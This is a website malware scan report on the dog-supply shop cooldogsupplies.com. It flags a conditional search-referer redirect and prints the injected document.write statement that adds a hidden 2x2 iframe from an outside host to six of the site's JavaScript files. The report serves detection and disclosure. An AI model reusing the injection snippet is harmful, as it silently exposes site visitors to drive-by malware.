Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.cooldogsupplies.com/ (request imitating a visitor arriving from a search engine; the same URL in the scan below returned 200 OK, which suggests the redirect is served conditionally, e.g. based on the Referer header) GET / HTTP/1.1 Host: www.cooldogsupplies.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 31 Aug 2014 12:48:30 GMT Location: http://kristasaidyes.com/zlft.html?h=2594864 Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.cooldogsupplies.com/ | 200 OK Content-Length: 63300 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/index.php?action=tracking_script | 200 OK Content-Length: 182 Content-Type: text/javascript | clean |
http://www.cooldogsupplies.com/javascript/jquery.js?7a2ca | 200 OK Content-Length: 78762 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus engines; see below). The injected statement is shown first, followed by an excerpt of the file's own script: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/javascript/menudrop.js?7a2ca | 200 OK Content-Length: 392 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus engines; see below). The injected statement is shown first, followed by an excerpt of the file's own script: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
$(document).ready(function() { if(document.all) { $('#Menu li.HasSubMenu').hover(function() { $(this).addClass('over'); return false; }, function() { $(this).removeClass('over'); }); } }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/javascript/common.js?7a2ca | 200 OK Content-Length: 18238 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus engines; see below). The injected statement is shown first, followed by an excerpt of the file's own script: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
function get_cookie(name) { name = name += "="; var cookie_start = document.cookie.indexOf(name); if(cookie_start > -1) { cookie_start = cookie_start+name.length; cookie_end = document.cookie.indexOf(';', cookie_start); if(cookie_end == -1) { cookie_end = document.cookie.len $.each(classes, function(key,value){ if (value === className) { return; } var result = classExpression.exec(value); if (result === null) { return; } var id = result[1]; if ($('#' + id ).attr('checked')) { checked = true; return false; } }); if (!checked) { $$.hide(); } }); }).change(); }); var config = {}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/javascript/iselector.js?7a2ca | 200 OK Content-Length: 8956 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus engines; see below). The injected statement is shown first, followed by an excerpt of the file's own script: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
if(typeof(ISSelectReplacement) == 'undefined') { var ISSelectReplacement = { init: function() { if(window.addEventListener) window.addEventListener('load', ISSelectReplacement.on_load, false); else window.attachEvent('onload', ISSelectReplacement.on_load); }, var option = replacement.childNodes[id[0]]; } option.selected = checkbox.checked; $(element).parents('div')[0].selectedIndex = replacement.selectedIndex; $(option).triggerHandler('click'); if (checkbox.checked) { $(element).addClass('SelectedRow'); } else { $(element).removeClass('SelectedRow'); } } }; ISSelectReplacement.init(); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/account.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 12:48:36 GMT Pragma: no-cache Location: http://www.cooldogsupplies.com/login.php?from=account.php%3Faction%3D Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: SHOP_SESSION_TOKEN=c74823b90bab222379efa8b5567cc2b0; expires=Sun, 07-Sep-2014 12:48:36 GMT; path=/; domain=.cooldogsupplies.com; HttpOnly | clean |
http://www.cooldogsupplies.com/login.php?from=account.php%3faction%3d | 200 OK Content-Length: 52171 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/orderstatus.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 12:48:38 GMT Pragma: no-cache Location: http://www.cooldogsupplies.com/account.php?action=order_status Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: SHOP_SESSION_TOKEN=a90cacbb79e7a74f478f5a97cebdc484; expires=Sun, 07-Sep-2014 12:48:38 GMT; path=/; domain=.cooldogsupplies.com; HttpOnly | clean |
http://www.cooldogsupplies.com/account.php?action=order_status | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 12:48:39 GMT Pragma: no-cache Location: http://www.cooldogsupplies.com/login.php?from=account.php%3Faction%3Dorder_status Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: SHOP_SESSION_TOKEN=bfd6d0ec2db6f0c7951201c902371194; expires=Sun, 07-Sep-2014 12:48:39 GMT; path=/; domain=.cooldogsupplies.com; HttpOnly | clean |
http://www.cooldogsupplies.com/login.php?from=account.php%3faction%3dorder_status | 200 OK Content-Length: 52171 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/wishlist.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 12:48:41 GMT Pragma: no-cache Location: http://www.cooldogsupplies.com/login.php?from=wishlist.php%3F Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: SHOP_SESSION_TOKEN=f85f86d41d6c122770a0a77b0a2e4c33; expires=Sun, 07-Sep-2014 12:48:41 GMT; path=/; domain=.cooldogsupplies.com; HttpOnly | clean |
http://www.cooldogsupplies.com/login.php?from=wishlist.php%3f | 200 OK Content-Length: 52171 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/cart.php | 200 OK Content-Length: 62367 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/javascript/cart.js?7a2ca | 200 OK Content-Length: 5891 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus engines; see below). The injected statement is shown first, followed by an excerpt of the file's own script: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
var Cart = { ToggleShippingEstimation: function() { $('.EstimatedShippingMethods').hide(); $('.EstimateShipping').toggle(); $('.EstimateShippingLink').toggle(); $('.EstimateShipping select:eq(0)').focus(); }, EstimateShipping: function() { if ($('#shippingZoneCou if(confirm(lang.DeleteProductFieldFileConfirmation)) { $.ajax({ url: 'remote.php', type: 'post', data: 'w=deleteuploadedfileincart&field='+fieldid+'&item='+itemid, success: function(data) { document.getElementById('CurrentProductFile_'+fieldid).value = ''; $('#CartFileName_'+fieldid).hide(); } }); } return; }, ReloadCart: function() { window.location = "cart.php"; } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/javascript/jquery/plugins/imodal/imodal.js?7a2ca | 200 OK Content-Length: 10338 Content-Type: application/javascript | clean |
http://www.cooldogsupplies.com/login.php | 200 OK Content-Length: 52123 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/login.php?action=create_account | 200 OK Content-Length: 75154 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/javascript/formfield.js?7a2ca | 200 OK Content-Length: 20782 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus engines; see below). The injected statement is shown first, followed by an excerpt of the file's own script: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
var FormField = { 'GetField': function(fieldId) { if (isNaN(fieldId) && typeof(fieldId) == 'object') { fieldId = parseInt(($(fieldId).attr('id')).substr(10)); } if (fieldId == '' || isNaN(fieldId)) { return false; } var field = $('#FormField_ $('.billingButton').val(lang.BillAndShipToAddress); $('.shippingButton').val(lang.ShipToThisAddress); $('#ship_to_billing_existing').attr('checked', true); } else { $('.billingButton').val(lang.BillToThisAddress); $('.shippingButton').val(lang.ShipToThisAddress); $('#ship_to_billing_existing').attr('checked', false); } } } $(document).ready(function() { $('.FormField.JSHidden').show(); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cooldogsupplies.com
Result: This site is not currently listed as suspicious. (Blacklist listings can lag behind a compromise, so this result does not override the malicious findings reported above.)
Query: http://yandex.com/infected?l10n=en&url=http://cooldogsupplies.com/
Result: cooldogsupplies.com is not infected or malware details are not published yet.